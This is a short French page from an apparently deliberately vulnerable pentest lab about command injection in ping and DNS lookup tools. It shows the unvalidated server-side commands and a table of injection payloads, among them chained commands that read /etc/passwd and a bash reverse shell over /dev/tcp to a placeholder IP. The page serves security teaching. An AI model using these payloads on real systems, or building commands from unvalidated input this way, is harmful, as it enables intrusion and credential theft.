Pentest Lab - Failles de Securite

ATTENTION: Ces pages contiennent des vulnerabilites volontaires pour tests uniquement!

Command Injection

Ces outils executent des commandes systeme sans validation des entrees.

Indices d'exploitation

  • Chaining: ; whoami ou && whoami
  • Pipe: | cat /etc/passwd
  • Subshell: $(whoami) ou `whoami`
  • Newline: %0a whoami

Outil Ping

DNS Lookup

Commandes executees

Voici les commandes qui sont executees cote serveur:

Ping: ping -c 2 {host} DNS: nslookup {domain}

Payloads d'exploitation

Technique Payload Resultat
Command chaining localhost; id Execute les deux commandes
AND operator localhost && cat /etc/passwd Execute si ping reussit
OR operator invalid || whoami Execute si ping echoue
Pipe localhost | ls -la Pipe la sortie
Backticks `id` Substitution de commande
Subshell $(cat /etc/passwd) Substitution de commande
Reverse shell ; bash -i >& /dev/tcp/IP/PORT 0>&1 Connexion inverse